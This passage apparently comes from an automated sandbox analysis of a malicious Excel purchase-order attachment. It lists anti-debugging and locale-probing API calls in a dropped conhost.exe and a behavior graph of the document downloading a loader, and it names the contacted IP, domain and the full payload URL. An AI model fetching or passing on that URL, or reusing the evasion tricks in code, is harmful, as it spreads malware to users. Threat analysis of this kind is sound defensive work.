Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00513A1B mov eax, dword ptr fs:[00000030h] 3_2_00513A1B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0054DAF2 mov eax, dword ptr fs:[00000030h] 3_2_0054DAF2
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0054DB6B mov eax, dword ptr fs:[00000030h] 3_2_0054DB6B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0054DB38 mov eax, dword ptr fs:[00000030h] 3_2_0054DB38
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00440C62 GetProcessHeap, 3_2_00440C62
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00440C62 GetProcessHeap, 3_2_00440C62
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00429B5B SetUnhandledExceptionFilter, 3_2_00429B5B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00429778 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00429778
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_004299C8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_004299C8
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042DBDB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0042DBDB
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005399C8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_005399C8
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00429B5B SetUnhandledExceptionFilter, 3_2_00429B5B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00429778 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00429778
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_004299C8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_004299C8
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0042DBDB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0042DBDB
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005399C8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_005399C8

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00429BB0 cpuid 3_2_00429BB0
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00429BB0 cpuid 3_2_00429BB0
Contains functionality to query locales information (e.g. system language)
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 3_2_004426FE
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_004429EF
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_004429A4
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_00442A8A
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_00442B15
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW,GlobalAlloc, 3_2_00442D6A
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_00442E92
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_0043AF87
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW, 3_2_00442F9A
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_0044306D
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW, 3_2_0043B4FA
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 3_2_0055294E
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_00552BF4
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_00552C3F
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_00552CDA
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_00552D65
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW, 3_2_00552FBA
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_005530E2
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_0054B1D7
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW, 3_2_005531EA
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_005532BD
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW, 3_2_0054B74A
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 3_2_004426FE
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_004429EF
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_004429A4
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_00442A8A
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_00442B15
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW,GlobalAlloc, 3_2_00442D6A
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_00442E92
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_0043AF87
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW, 3_2_00442F9A
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_0044306D
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW, 3_2_0043B4FA
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 3_2_0055294E
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_00552BF4
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_00552C3F
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_00552CDA
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_00552D65
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW, 3_2_00552FBA
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_005530E2
Source: C:\ETTER\dAneDFma\conhost.exe Code function: EnumSystemLocalesW, 3_2_0054B1D7
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW, 3_2_005531EA
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_005532BD
Source: C:\ETTER\dAneDFma\conhost.exe Code function: GetLocaleInfoW, 3_2_0054B74A
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043B539 GetSystemTimeAsFileTime, 3_2_0043B539
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043B539 GetSystemTimeAsFileTime, 3_2_0043B539
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 319311 Sample: PURCHASE ORDER No-17-11-985... Startdate: 18/11/2020 Architecture: WINDOWS Score: 100 22 Multi AV Scanner detection for domain / URL 2->22 24 Multi AV Scanner detection for dropped file 2->24 26 Multi AV Scanner detection for submitted file 2->26 28 6 other signatures 2->28 6 EXCEL.EXE 85 46 2->6         started        process3 dnsIp4 20 gvbmkhvnyib.top 193.106.175.25, 49167, 80 IQHOSTRU Russian Federation 6->20 14 C:\Users\user\...\conhost[1].triumphloader, PE32 6->14 dropped 16 C:TTER\dAneDFma\conhost.exe, PE32 6->16 dropped 18 C:\...\~$PURCHASE ORDER No-17-11-98543.xlsm, data 6->18 dropped 30 Document exploit detected (creates forbidden files) 6->30 32 Document exploit detected (process start blacklist hit) 6->32 34 Document exploit detected (UrlDownloadToFile) 6->34 11 conhost.exe 6->11         started        file5 signatures6 process7 signatures8 36 Multi AV Scanner detection for dropped file 11->36 38 Detected unpacking (changes PE section rights) 11->38 40 Detected unpacking (overwrites its own PE header) 11->40 42 2 other signatures 11->42
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
193.106.175.25
 unknown Russian Federation
50465 IQHOSTRU true

Contacted Domains

Name IP Active
gvbmkhvnyib.top 193.106.175.25 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://gvbmkhvnyib.top/QtuFGobZaW/conhost.triumphloader true
  • 7%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown